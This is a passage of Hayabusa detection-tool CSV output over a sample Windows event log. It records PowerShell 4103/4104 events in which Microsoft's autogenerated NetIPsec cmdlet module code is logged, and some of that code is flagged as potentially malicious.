ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIPsecDoSPSetting')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = 
$script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, 
$__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecDospSetting' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.779 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.781 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.781 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" 
ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecDospSetting"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.781 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecDospSetting"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.782 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecDospSetting"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.782 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecDospSetting"" ParameterBinding(Export-ModuleMember): name=""Alias""; 
value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.807 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIPsecIdentity' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.807 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName 
= 'root/standardcimv2/MSFT_NetIPsecIdentity' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.808 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.808 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; 
value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.833 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetMainModeSA' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetIPsecMainModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 
'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeSA') -and (@('ByAssociatedNetIPsecQuickModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeSA}, 'MSFT_NetSAAssociation', 'Dependent', 'Antecedent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecMainModeSA' -Alias '*' function Remove-NetIPsecMainModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeSA') -and (@('ByAssociatedNetIPsecQuickModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeSA}, 'MSFT_NetSAAssociation', 'Dependent', 'Antecedent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByAssociatedNetIPsecQuickModeSA', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecMainModeSA' -Alias 
'*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.833 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetMainModeSA' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetIPsecMainModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 
'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeSA') -and (@('ByAssociatedNetIPsecQuickModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeSA}, 'MSFT_NetSAAssociation', 'Dependent', 'Antecedent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecMainModeSA' -Alias '*' function Remove-NetIPsecMainModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeSA') -and (@('ByAssociatedNetIPsecQuickModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeSA}, 'MSFT_NetSAAssociation', 'Dependent', 'Antecedent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByAssociatedNetIPsecQuickModeSA', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in 